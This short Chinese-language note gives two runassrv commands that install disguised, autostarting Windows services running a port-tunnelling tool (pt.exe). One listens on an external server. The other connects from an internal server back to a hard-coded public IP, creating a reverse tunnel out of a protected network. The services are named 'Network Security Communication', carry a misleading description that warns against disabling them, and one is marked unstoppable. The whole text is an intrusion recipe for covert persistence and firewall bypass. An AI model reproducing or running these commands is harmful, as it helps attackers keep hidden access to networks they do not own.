外网服务器上的:
runassrv add /cmdline:"C:\WINDOWS\system32\pt.exe -listen 88 1111" /name:"Mysrv1" /dispname:"Network Security Communication" /desc:"To provide secure communications network, if this service is disabled, any services dependent on it will not be able to start." /starttype:autostart /unstoppable
内网服务器上的:
runassrv add /cmdline:"C:\WINNT\system32\pt.exe -slave 59.61.105.11 88 127.0.0.1 1111" /name:"Mysrv1" /dispname:"Network Security Communication" /desc:"To provide secure communications network, if this service is disabled, any services dependent on it will not be able to start." /starttype:autostart